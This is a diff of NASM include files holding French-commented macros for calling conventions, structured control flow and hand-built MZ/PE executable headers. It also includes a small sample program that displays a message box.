%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20
|
||||
%endmacro
|
||||
|
||||
;================================= Function ==================================
|
||||
%macro Function 1-*
|
||||
FUNCTION.INC~
|
||||
%ifndef Function_%1
|
||||
%ifctx Function
|
||||
Error FUNCTION,Function =X=> Function
|
||||
%else
|
||||
%push Function
|
||||
%define Function_%1
|
||||
%define Function_Name_Define @%1
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%define Function_EBP byte ebp
|
||||
%endif
|
||||
%define Function_EIP byte ebp+4
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%assign Function_Params_Assign 4
|
||||
%if %0>1
|
||||
%rotate 1
|
||||
%rep %0-1
|
||||
%assign Function_Params_Assign Function_Params_Assign+4
|
||||
%1_Equ equ Function_Params_Assign
|
||||
%define %1 byte ebp+%1_Equ
|
||||
%rotate 1
|
||||
%endrep
|
||||
%endif
|
||||
%assign Function_Locals_Assign 0
|
||||
%endif
|
||||
%undef Function_Exist_Define
|
||||
%else
|
||||
%define Function_Exist_Define
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResd 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2*4
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResd %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResd => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResw 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2*2
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResw %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResw => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResb 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResb %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResb => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionBegin 0
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
Function_Name_Define:
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
|
||||
push ebp
|
||||
mov ebp,esp
|
||||
%endif
|
||||
%if Function_Locals_Assign>0
|
||||
Sub esp,Function_Locals_Assign
|
||||
%endif
|
||||
; enter Function_Locals_Assign,0
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%else
|
||||
Error FUNCTION,FunctionBegin => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionEnd 0
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
|
||||
leave
|
||||
%endif
|
||||
%ifnidni FUNCTION.INC_CONVENTION,C
|
||||
%if Function_Params_Assign==4
|
||||
ret
|
||||
%elifndef BYTE.INC_NO_00
|
||||
ret Function_Params_Assign-4
|
||||
%else
|
||||
Error FUNCTION,NO_00 =X=> CONVENTION Std
|
||||
%endif
|
||||
%else
|
||||
ret
|
||||
%endif
|
||||
%undef Function_Name_Define
|
||||
%pop
|
||||
%else
|
||||
Error FUNCTION,FunctionEnd => Function
|
||||
%endif
|
||||
%endif
|
||||
%undef Function_Exist_Define
|
||||
FUNCTION.INC~
|
||||
%endmacro
|
||||
|
||||
;=================================== Call ====================================
|
||||
%macro FunctionCallStd 1-*
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%rep %0-1
|
||||
%rotate -1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%endmacro
|
||||
|
||||
%macro FunctionCallPascal 1-*
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%rep %0-1
|
||||
%rotate 1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%endmacro
|
||||
|
||||
%macro FunctionCallC 1-*
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%else
|
||||
%ifdef BYTE.INC_TEMPORARY_REGISTER
|
||||
%ifidni BYTE.INC_TEMPORARY_REGISTER,eax
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER <> eax
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
|
||||
%endif
|
||||
%endif
|
||||
%rep %0-1
|
||||
%rotate -1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%if %0>1
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%assign FunctionCallC_Assign (%0-1)*4
|
||||
add esp,FunctionCallC_Assign
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%else
|
||||
%ifdef BYTE.INC_TEMPORARY_REGISTER
|
||||
%rep %0-1
|
||||
pop BYTE.INC_TEMPORARY_REGISTER
|
||||
%endrep
|
||||
%else
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
|
||||
%endif
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;FunctionCall nom fonction [,p1,...]
|
||||
%macro FunctionCall 1-2+
|
||||
%ifdef FunctionDefine_%1
|
||||
%define FunctionCall_Address_Define @%1
|
||||
%ifidni FunctionDefine_%1,Std
|
||||
%if %0==1
|
||||
FunctionCallStd %1
|
||||
%else
|
||||
FunctionCallStd %1,%2
|
||||
%endif
|
||||
%elifidni FunctionDefine_%1,Pascal
|
||||
%if %0==1
|
||||
FunctionCallPascal %1
|
||||
%else
|
||||
FunctionCallPascal %1,%2
|
||||
%endif
|
||||
%else
|
||||
%if %0==1
|
||||
FunctionCallC %1
|
||||
%else
|
||||
FunctionCallC %1,%2
|
||||
%endif
|
||||
%endif
|
||||
%undef FunctionCall_Address_Define
|
||||
%else
|
||||
%if %0==1
|
||||
Error FUNCTION,FunctionCall %1
|
||||
%else
|
||||
Error FUNCTION,FunctionCall %1,%2
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,328 @@
|
|||
; MACROS FOR STRUCTURATED PROGRAMMING v0.9a
|
||||
; =========================================
|
||||
|
||||
|
||||
;Continue
|
||||
;Break
|
||||
|
||||
;IfJmp {valeur1},condition,valeur2,l [,-1|+1]
|
||||
;IfNotJmp {valeur1},condition,valeur2,l [,-1|+1]
|
||||
;If {valeur1},condition,valeur2
|
||||
;IfX condition asm
|
||||
; ...
|
||||
;[Else]
|
||||
; [...]
|
||||
;EndIf
|
||||
|
||||
;Switch v
|
||||
;Case v1
|
||||
;...
|
||||
;[Default]
|
||||
; [...]
|
||||
;EndSwitch
|
||||
; les conditions Case sont évaluées juste avant leur exécution, à la
|
||||
; différence du C !!!
|
||||
|
||||
;While [{valeur1},condition,valeur2]
|
||||
; ...
|
||||
;EndWhile [{valeur1},condition,valeur2]
|
||||
|
||||
;Until [{valeur1},condition,valeur2]
|
||||
; ...
|
||||
;EndUntil [{valeur1},condition,valeur2]
|
||||
|
||||
;For compteur,valeur_début,condition,valeur_fin,valeur_incrément
|
||||
; ...
|
||||
;EndFor
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _LANGUAGE.INC
|
||||
%define _LANGUAGE.INC
|
||||
|
||||
%include "byte.inc"
|
||||
|
||||
;============================= Continue-Break ================================
|
||||
%macro Continue 0
|
||||
%ifdef %$BeginEnd
|
||||
Jmp %$Begin,-1
|
||||
%elifdef %$$BeginEnd
|
||||
Jmp %$$Begin,-1
|
||||
%elifdef %$$$BeginEnd
|
||||
Jmp %$$$Begin,-1
|
||||
%elifdef %$$$$BeginEnd
|
||||
Jmp %$$$$Begin,-1
|
||||
%elifdef %$$$$$BeginEnd
|
||||
Jmp %$$$$$Begin,-1
|
||||
%elifdef %$$$$$$BeginEnd
|
||||
Jmp %$$$$$$Begin,-1
|
||||
%elifdef %$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$Begin,-1
|
||||
%elifdef %$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$Begin,-1
|
||||
%elifdef %$$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$$Begin,-1
|
||||
%elifdef %$$$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$$$Begin,-1
|
||||
%else
|
||||
Error LANGUAGE,Continue => 10 blocs maximum
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Break 0
|
||||
%ifdef %$BeginEnd
|
||||
Jmp %$End,+1
|
||||
%elifdef %$$BeginEnd
|
||||
Jmp %$$End,+1
|
||||
%elifdef %$$$BeginEnd
|
||||
Jmp %$$$End,+1
|
||||
%elifdef %$$$$BeginEnd
|
||||
Jmp %$$$$End,+1
|
||||
%elifdef %$$$$$BeginEnd
|
||||
Jmp %$$$$$End,+1
|
||||
%elifdef %$$$$$$BeginEnd
|
||||
Jmp %$$$$$$End,+1
|
||||
%elifdef %$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$End,+1
|
||||
%elifdef %$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$End,+1
|
||||
%elifdef %$$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$$End,+1
|
||||
%elifdef %$$$$$$$$$$BeginEnd
|
||||
Jmp %$$$$$$$$$$End,+1
|
||||
%else
|
||||
Error LANGUAGE,Break => 10 blocs maximum
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;==================================== If =====================================
|
||||
%macro IfJmp 4+
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
Cmp %1,%3
|
||||
%else
|
||||
%1
|
||||
Cmp eax,%3
|
||||
%endif
|
||||
%ifidni %2,==
|
||||
JX e,%4
|
||||
%elifidni %2,!=
|
||||
JX ne,%4
|
||||
%elifidni %2,<
|
||||
JX b,%4
|
||||
%elifidni %2,>
|
||||
JX a,%4
|
||||
%elifidni %2,<=
|
||||
JX be,%4
|
||||
%elifidni %2,>=
|
||||
JX ae,%4
|
||||
%else
|
||||
Error LANGUAGE,IfJmp v1,condition,v2,label
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro IfNotJmp 4+
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
Cmp %1,%3
|
||||
%else
|
||||
%1
|
||||
Cmp eax,%3
|
||||
%endif
|
||||
%ifidni %2,==
|
||||
JX ne,%4
|
||||
%elifidni %2,!=
|
||||
JX e,%4
|
||||
%elifidni %2,<
|
||||
JX ae,%4
|
||||
%elifidni %2,>
|
||||
JX be,%4
|
||||
%elifidni %2,<=
|
||||
JX a,%4
|
||||
%elifidni %2,>=
|
||||
JX b,%4
|
||||
%else
|
||||
Error LANGUAGE,IfNotJmp v1,condition,v2,label
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro If 3
|
||||
%push If
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfNotJmp %1,%2,%3,%$If_Not,+1
|
||||
%else
|
||||
IfNotJmp {%1},%2,%3,%$If_Not,+1
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro IfX 1
|
||||
%push If
|
||||
JnX %1,%$If_Not,+1
|
||||
%endmacro
|
||||
|
||||
%macro Else 0
|
||||
%ifctx If
|
||||
Jmp %$If_End,+1
|
||||
%$If_Not:
|
||||
%repl Else
|
||||
%else
|
||||
Error LANGUAGE,Else => If | IfX
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro EndIf 0
|
||||
%ifctx If
|
||||
%$If_Not:
|
||||
%pop
|
||||
%elifctx Else
|
||||
%$If_End:
|
||||
%pop
|
||||
%else
|
||||
Error LANGUAGE,EndIf => If | IfX | Else
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== Switch ===================================
|
||||
%macro Switch 1
|
||||
%push Switch
|
||||
%define %$BeginEnd
|
||||
%define %$Switch_V_Define %1
|
||||
%$Begin:
|
||||
%endmacro
|
||||
|
||||
%macro Case 1
|
||||
%ifdef %$Switch_NeedEndIf_Define
|
||||
EndIf
|
||||
%endif
|
||||
%ifctx Switch
|
||||
If %$Switch_V_Define,==,%1
|
||||
%define %$Switch_NeedEndIf_Define
|
||||
%else
|
||||
Error LANGUAGE,Case => Switch
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Default 0
|
||||
%ifdef %$Switch_NeedEndIf_Define
|
||||
EndIf
|
||||
%endif
|
||||
%ifctx Switch
|
||||
%else
|
||||
Error LANGUAGE,Default => Switch
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro EndSwitch 0
|
||||
%ifdef %$Switch_NeedEndIf_Define
|
||||
EndIf
|
||||
%endif
|
||||
%ifctx Switch
|
||||
%$End:
|
||||
%pop
|
||||
%else
|
||||
Error LANGUAGE,EndSwitch => Switch
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== While ====================================
|
||||
%macro While 0-3
|
||||
%push While
|
||||
%define %$BeginEnd
|
||||
%$Begin:
|
||||
%if %0!=0
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfNotJmp %1,%2,%3,%$End,+1
|
||||
%else
|
||||
IfNotJmp {%1},%2,%3,%$End,+1
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro EndWhile 0-3
|
||||
%ifctx While
|
||||
%if %0!=0
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfJmp %1,%2,%3,%$Begin,-1
|
||||
%else
|
||||
IfJmp {%1},%2,%3,%$Begin,-1
|
||||
%endif
|
||||
%else
|
||||
Continue
|
||||
%endif
|
||||
%$End:
|
||||
%pop
|
||||
%else
|
||||
Error LANGUAGE,EndWhile => While
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== Until ====================================
|
||||
%macro Until 0-3
|
||||
%push Until
|
||||
%define %$BeginEnd
|
||||
%$Begin:
|
||||
%if %0!=0
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfJmp %1,%2,%3,%$End,+1
|
||||
%else
|
||||
IfJmp {%1},%2,%3,%$End,+1
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro EndUntil 0-3
|
||||
%ifctx Until
|
||||
%if %0!=0
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfNotJmp %1,%2,%3,%$Begin,-1
|
||||
%else
|
||||
IfNotJmp {%1},%2,%3,%$Begin,-1
|
||||
%endif
|
||||
%else
|
||||
Continue
|
||||
%endif
|
||||
%$End:
|
||||
%pop
|
||||
%else
|
||||
Error LANGUAGE,EndUntil => Until
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;=================================== For =====================================
|
||||
%macro For 5
|
||||
%push For
|
||||
%define %$BeginEnd
|
||||
%define %$For_1_Define %1
|
||||
%define %$For_5_Define %5
|
||||
Mov %1,%2
|
||||
%$Begin:
|
||||
MultiParams %1
|
||||
%if MultiParams_Ret==1
|
||||
IfNotJmp %1,%3,%4,%$End,+1
|
||||
%else
|
||||
IfNotJmp {%1},%3,%4,%$End,+1
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro EndFor 0
|
||||
%ifctx For
|
||||
%if %$For_5_Define>0
|
||||
Add %$For_1_Define,%$For_5_Define
|
||||
%elif %$For_5_Define<0
|
||||
Sub %$For_1_Define,-%$For_5_Define
|
||||
%else
|
||||
%endif
|
||||
Continue
|
||||
%$End:
|
||||
%pop
|
||||
%else
|
||||
Error LANGUAGE,EndFor => For
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,54 @@
|
|||
; GENERAL MACROS FOR NASM v1.0a
|
||||
; =============================
|
||||
|
||||
|
||||
;NASM.INC_NO_WARNING => ne pas afficher les warnings utilisateurs
|
||||
|
||||
|
||||
;Error include(sans .INC),message
|
||||
;Warning include(sans .INC),message
|
||||
|
||||
;MultiParams p
|
||||
; -> MultiParams_Ret = nombre de paramètres
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _NASM.INC
|
||||
%define _NASM.INC
|
||||
|
||||
%push _NASM.INC ;pour éviter erreurs %ifctx
|
||||
|
||||
%macro NASM.INC 0
|
||||
%undef NASM.INC_NO_WARNING
|
||||
%assign ErrorWarning_Assign 0
|
||||
%endmacro
|
||||
|
||||
%macro NASM.INC~ 0
|
||||
NASM.INC
|
||||
%endmacro
|
||||
|
||||
NASM.INC
|
||||
|
||||
%macro Error 2+
|
||||
ErrorWarningNext
|
||||
%error %1.INC error: %2
|
||||
%endmacro
|
||||
|
||||
%macro Warning 2+
|
||||
%ifndef NASM.INC_NO_WARNING
|
||||
ErrorWarningNext
|
||||
%error %1.INC warning: %2
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro ErrorWarningNext 0
|
||||
%assign ErrorWarning_Assign ErrorWarning_Assign+1
|
||||
%if ErrorWarning_Assign==1
|
||||
%error ===============================================
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro MultiParams 1-*
|
||||
%define MultiParams_Ret %0
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,112 @@
|
|||
; PE FILE STRUCTURE
|
||||
; =================
|
||||
|
||||
%include "pe.inc"
|
||||
|
||||
BIN_Begin
|
||||
MZHeader
|
||||
MZExtendedHeader
|
||||
MZSection.text_Begin
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,MZSection.text_VA(text_string)
|
||||
mov ah,09
|
||||
int 21h
|
||||
mov ax,4C01h
|
||||
int 21h
|
||||
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
|
||||
MZSection.text_End
|
||||
|
||||
PEHeader
|
||||
%define PEOptionalheader_EipRVA PESection.text_RVA(mondebut)
|
||||
PEOptionalHeader_Begin
|
||||
PEOptionalHeader_Directory Export,0,0
|
||||
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
|
||||
; PEOptionalHeader_Directory Resource,0,0
|
||||
; PEOptionalHeader_Directory Exception,0,0
|
||||
; PEOptionalHeader_Directory Security,0,0
|
||||
; PEOptionalHeader_Directory Relocations,0,0
|
||||
; PEOptionalHeader_Directory Debug,0,0
|
||||
; PEOptionalHeader_Directory ImageDescription,0,0
|
||||
; PEOptionalHeader_Directory MachineSpecific,0,0
|
||||
; PEOptionalHeader_Directory ThreadLocalStorage,0,0
|
||||
PEOptionalHeader_End
|
||||
|
||||
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS
|
||||
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESections_Begin
|
||||
PESection.text_Begin
|
||||
int 03h
|
||||
mondebut:
|
||||
MB_OK equ 0
|
||||
mov eax,MB_OK
|
||||
push eax
|
||||
mov eax,PESection.rdata_VA(message)
|
||||
call [GetCommandLineA]
|
||||
push eax
|
||||
push eax
|
||||
mov eax,0
|
||||
push eax
|
||||
call [MessageBoxA]
|
||||
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
|
||||
mov [PESection.text_VA(text1)],eax
|
||||
mov [PESection.rdata_VA(rdata1)],ebx
|
||||
mov [PESection.data_VA(data1)],ecx
|
||||
mov [PESection.bss_VA(bss1)],edx
|
||||
text1:
|
||||
jmp short mondebut
|
||||
PESection.text_End
|
||||
|
||||
PESection.rdata_Begin
|
||||
message: db "coucou",0
|
||||
rdata1: times 1001h db 22h ;db 'data1'
|
||||
PESection.rdata_End
|
||||
|
||||
PESection.data_Begin
|
||||
data1: times 1205h db 0FEh
|
||||
PESection.data_End
|
||||
|
||||
PESection.bss_Begin
|
||||
bss1: resb 1001h
|
||||
PESection.bss_End
|
||||
|
||||
PESection.idata_Begin
|
||||
Import_Directorys_Begin .idata
|
||||
Import_Directory KERNEL32
|
||||
Import_Directory USER32
|
||||
Import_Directorys_End
|
||||
|
||||
Import_RVAs_Begin KERNEL32
|
||||
Import_RVA KERNEL32,GetCommandLineA
|
||||
Import_RVA KERNEL32,ExitProcess
|
||||
Import_RVAs_End
|
||||
Import_RVAs_Begin USER32
|
||||
Import_RVA USER32,MessageBoxA
|
||||
Import_RVAs_End
|
||||
|
||||
Import_VAs_Begin KERNEL32
|
||||
Import_VA KERNEL32,GetCommandLineA,0BFF8C5ACh
|
||||
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
|
||||
Import_VAs_End
|
||||
Import_VAs_Begin USER32
|
||||
Import_VA USER32,MessageBoxA
|
||||
Import_VAs_End
|
||||
|
||||
Import_Strings_Begin KERNEL32
|
||||
Import_String_Function KERNEL32,GetCommandLineA,"GetCommandLineA",0D0h
|
||||
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
|
||||
Import_String_Dll KERNEL32,"KERNEL32.DLL"
|
||||
Import_Strings_End
|
||||
Import_Strings_Begin USER32
|
||||
Import_String_Function USER32,MessageBoxA,"MessageBoxA"
|
||||
Import_String_Dll USER32,"USER32.DLL"
|
||||
Import_Strings_End
|
||||
PESection.idata_End
|
||||
|
||||
|
||||
|
||||
PESections_End
|
||||
BIN_End
|
|
@ -0,0 +1,654 @@
|
|||
;corriger ;???
|
||||
;raison inconnue ; ?
|
||||
|
||||
|
||||
;gestion message d'erreur structures (%error)
|
||||
; %define et %ifdef pour tester l'existence de header n‚cessaires
|
||||
; (pour ‚viter les erreurs de label ind‚finis)
|
||||
|
||||
;.edata,.rsrc (icones)
|
||||
|
||||
;supprimer macro Directories ? (calcul automatique ?)
|
||||
|
||||
|
||||
; MACROS AND DEFINITIONS FOR PE FILES v1.0a
|
||||
; =========================================
|
||||
;By rix-shogun-agressor (erix@mail.dotcom.fr,rix@dreamnet.org)
|
||||
|
||||
;conventions:
|
||||
;xxx_VA: adresse virtuelle (adresse en m‚moire)
|
||||
;xxx_RVA: d‚placement d'adresse virtuel (offset d'adresse en m‚moire%baseVA)
|
||||
;xxx_VS: taille virtuelle (taille en m‚moire)
|
||||
;xxx_FS: taille fichier
|
||||
;xxx_FA: adresse fichier (offset dans le fichier)
|
||||
;xxx_Fa: file alignement
|
||||
;xxx-Va: virtual alignement (alignement m‚moire)
|
||||
;xxx_Assign: assignation pour un calcul ‚valu‚ plus tard
|
||||
;xxx_Define: definition pour un calcul ‚valu‚ plus tard dont une des valeurs
|
||||
; est toujours inconnue
|
||||
;xxx_Ifctx: macros pour regrouper plusieurs %ifctx
|
||||
;xxx: valeur
|
||||
|
||||
;sections: text,
|
||||
;macros de d‚finitions des header: NOM[SousNom]_Begin NOM[SousNom]_End
|
||||
; ou bien: NOM[SousNom]
|
||||
;define de d‚finitions des headers: NOM[SousNom]_Xxx
|
||||
;definition de constantes des header: NOM[SousNom]_XXX
|
||||
;nom interne aux macros NOMHeader NOM[SousNom]_Begin_FA NOM[SousNom]_End_FA
|
||||
|
||||
;MacroXXX:macros internes
|
||||
|
||||
;xxxx:normal
|
||||
;xxxxa:align‚ (V=>align‚ virtuel,F=>align‚ fichier)
|
||||
|
||||
;equ: valeur calcul‚e d'aprŠs nombres suivants l'endroit de stockage
|
||||
;%define: d‚claration des constantes utilisables par l'utilisateur
|
||||
;%assign: d‚claration des variables internes pour les calculs d'equ (_Assign)
|
||||
|
||||
;================================= BIN Begin =================================
|
||||
%ifndef PE.INC
|
||||
%define PE.INC
|
||||
%push PE.INC
|
||||
|
||||
%include "language.inc"
|
||||
|
||||
%macro BIN_Begin 0
|
||||
SECTION .text
|
||||
BIN_Begin_FA:
|
||||
%push BIN_Begin
|
||||
%endmacro
|
||||
|
||||
;================================= MZ Header =================================
|
||||
%define MZHeader_MinimumMemory 0 ;en paragraphes, … ajouter en fin de m‚moire
|
||||
%define MZHeader_MaximumMemory 0FFFFh ;en paragraphes, … ajouter en fin de m‚moire
|
||||
%define MZHeader_Ss 0000h
|
||||
%define MZHeader_Sp 00B8h ; ?
|
||||
%define MZHeader_Ip 0000h
|
||||
%define MZHeader_Cs 0000h
|
||||
|
||||
%macro MZHeader 0
|
||||
%ifctx BIN_Begin
|
||||
BITS 16
|
||||
MZHeader_Begin_FA:
|
||||
MZHeader_Signature_FA: db 'MZ'
|
||||
MZHeader_LastPageBytes_FA: dw (BIN_End_FAa-BIN_Begin_FA) % 512
|
||||
MZHeader_PagesNumber_FA: dw (BIN_End_FAa-BIN_Begin_FA)/512+1
|
||||
MZHeader_RelocationsNumber_FA: dw 0
|
||||
MZHeader_HeaderParagraphsNumber_FA: dw (MZExtendedHeader_End_FA-MZHeader_Begin_FA)/16
|
||||
MZHeader_MinimumMemory_FA: dw MZHeader_MinimumMemory
|
||||
MZHeader_MaximumMemory_FA: dw MZHeader_MaximumMemory
|
||||
MZHeader_Ss_FA: dw MZHeader_Ss
|
||||
MZHeader_Sp_FA: dw MZHeader_Sp
|
||||
MZHeader_Checksum_FA: dw 0
|
||||
MZHeader_Ip_FA: dw MZHeader_Ip
|
||||
MZHeader_Cs_FA: dw MZHeader_Cs
|
||||
MZHeader_RelocationTableFA_FA: dw 0040h ;0040h=>fichier PE
|
||||
MZHeader_OverlayNumber_FA: dw 0
|
||||
MZHeader_End_FA:
|
||||
%repl MZHeader
|
||||
%else
|
||||
%error PE.INC error: MZHeader => BIN_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================ MZ Extended Header =============================
|
||||
%macro MZExtendedHeader 0
|
||||
%ifctx MZHeader
|
||||
MZExtendedHeader_Begin_FA:
|
||||
dd 0
|
||||
dw 0
|
||||
%rep 26
|
||||
db 0
|
||||
%endrep
|
||||
MZExtendedHeader_PEHeaderFA_FA: dd PEHeader_Begin_FA
|
||||
MZExtendedHeader_End_FA:
|
||||
%repl MZExtendedHeader
|
||||
%else
|
||||
%error PE.INC error: MZExtendedHeader => MZHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
